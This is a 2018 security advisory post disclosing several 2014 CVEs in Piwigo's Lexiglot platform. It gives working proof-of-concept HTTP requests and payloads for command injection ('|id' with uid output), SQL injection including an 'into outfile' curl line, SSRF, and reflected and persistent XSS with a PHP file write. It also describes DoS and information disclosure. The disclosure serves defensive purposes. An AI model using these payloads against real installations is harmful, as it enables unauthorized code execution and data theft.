JAHx181 - Piwigo lexiglot multiple vulnerabilities

Posted by Eldar Marcussen on Tue May 8 19:14:44 EDT 2018

This advisory somehow slipped between the cracks, but hey, 4 years late is better than never...right?

About

Lexiglot is a translation platform for PHP projects developed in PHP. -- http://piwigo.org/translate

Command injection

CVE-2014-8945

The username and password fields are vulnerable to command injection when adding a new project.

POST /vvv/lexiglot/admin.php?page=projects HTTP/1.1

name=test%7Cid&svn_url=http%3A%2F%2Fhost%3A8888%2Ftest%7Cid&svn_user=test%7Cid&svn_password=test%7Cid&files=1%2C2%2C3&rank=1&category_id=&add_project=Add

HTTP/1.1 200 OK
  string(53) "uid=33(www-data) gid=33(www-data) groups=33(www-data)"

SQL Injection

CVE-2014-8941

There are several SQL injection vulnerabilties in the project.

~# curl 'http://192.168.58.134/vvv/lexiglot/admin.php?page=users&from_id=-1"+union+select+"abc"+into+outfile+"/tmp/winrar"+--+-'

POST /vvv/lexiglot/admin.php?page=history HTTP/1.1
Host: 192.168.58.134
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.58.134
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/38.0.2125.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.58.134/vvv/lexiglot/admin.php
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: lexiglot_remember_me=2-1415751084-sV2wWGNLwVjAwGDxwhXcw4oemS8%3D;
ck_login_id_20=1; ck_login_language_20=en_us;
PHPSESSID=jqnd14cvtvddkf99t8d18ikr17

user_id=-1&language=-1&project=-1&status=-1&limit=1'&search=Search

Cross site request forgery

CVE-2014-8942

The identified SQL injection can be exploited through CSRF

Server side request forgery

CVE-2014-8943

The add a project page will request urls provided for a svn repository to ensure its a valid svn repository, an attacker can abuse this to make the server make requests on behalf of the attacker.

POST /vvv/lexiglot/admin.php?page=projects HTTP/1.1

name=test&svn_url=http%3A%2F%2Fhost%3A8888%2F&svn_user=test&svn_password=test&files=test&rank=1&category_id=&add_project=Add

HTTP/1.1 200 OK
  string(132) "svn: OPTIONS of 'http://host:8888': Could not read
  status line: connection was closed by server
 (http://host:8888)"

Cross site scripting

CVE-2014-8944

There are both persistent and reflected xss in this project:

Reflected: Login with username a"><script>alert(1)</script>

Persistent: Through configuration interface, the install_name, intro_message and new_file_content parameters:

POST /vvv/lexiglot/admin.php?page=config HTTP/1.1
Host: 192.168.58.134
Proxy-Connection: keep-alive
Content-Length: 435
Cache-Control: max-age=0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.58.134
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/38.0.2125.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.58.134/vvv/lexiglot/admin.php?page=config
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie:
lexiglot_remember_me=2-1415755982-4D8DIXhWWhJEXJnq8Z%2BmNBJ%2BhSQ%3D;
ck_login_id_20=1; ck_login_language_20=en_us;
PHPSESSID=v97mnbctl9hlkc0564cgu7r034
X-FirePHP: 0.4.4
X-FirePHP-Version: 0.4.4
X-Wf-Max-Combined-Size: 262144

install_name=Lexiglot<script+src=xss>&intro_message=Welcome+on+your+new+installation+of+Lexiglot%21<script+src+xss2>&default_language=en_UK&var_name=lang&use_stats=1&use_talks=1&access_to_guest=1&allow_registration=1&allow_profile=1&user_can_add_language=1&user_default_language=own&user_default_project=all&language_default_user=all&project_default_user=all&new_file_content=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E%2F%2FWAT&save_config=Save

Denial of service

CVE-2014-8937

The api/update.php url is publicly accessible and will run svn update on all registered projects which consumes significant resources and ties up a web server thread. Multiple similtaneous requests to this url will cause resource exhaustion and render the web server inaccessible.

Local credential disclosure

CVE-2014-8938

The svn update function executes with username and password as command line arguments. In shared environments other users may be able to obtain these credentials by running the ps command:

~# ps auxw | grep svn
www-data 27662  0.0  0.4  12792  3548 ?        S    20:17   0:00 svn checkout  http://host:8888/ ./local/test --revision HEAD --username test --password test

Local path disclosure

CVE-2014-8939

Local path is disclosed by the following urls if php is configured to display warnings: include/smarty/plugins/modifier.date_format.php

Information disclosure

CVE-2014-8940

An attacker can access the /update.log url to view all the projects that have been updated, this can be used to leverage the aforementioned DoS attack or to browse repository code as the projects are checked out to /local/projectname. Example:

~# GET
http://localhost/vvv/lexiglot/update.log | head -1
[2014-11-08T11:58:10+01:00] rotateimage
~# GET
http://localhost/vvv/lexiglot/local/rotateimage | head -10
<title>Index of /vvv/lexiglot/local/rotateimage</title>

<img src="/icons/folder.gif" alt="[DIR]"> <a href="ar_SA/">ar_SA/</a>

Solution

Upgrade to the latest version or seek an alternative as the vendor deemed some of these issue acceptable.


Posted by Eldar Marcussen | Permanent link